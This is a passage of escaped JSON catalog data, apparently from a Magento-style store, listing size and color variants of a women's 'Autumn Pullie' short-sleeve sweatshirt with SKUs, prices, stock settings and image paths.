sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1017\":{\"sku\":\"WH03-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-S-Green\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1018\":{\"sku\":\"WH03-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-S-Purple\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1019\":{\"sku\":\"WH03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-S-Red\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1020\":{\"sku\":\"WH03-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-M-Green\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1021\":{\"sku\":\"WH03-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-M-Purple\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1022\":{\"sku\":\"WH03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-M-Red\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1023\":{\"sku\":\"WH03-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-L-Green\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1024\":{\"sku\":\"WH03-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-L-Purple\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1025\":{\"sku\":\"WH03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-L-Red\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0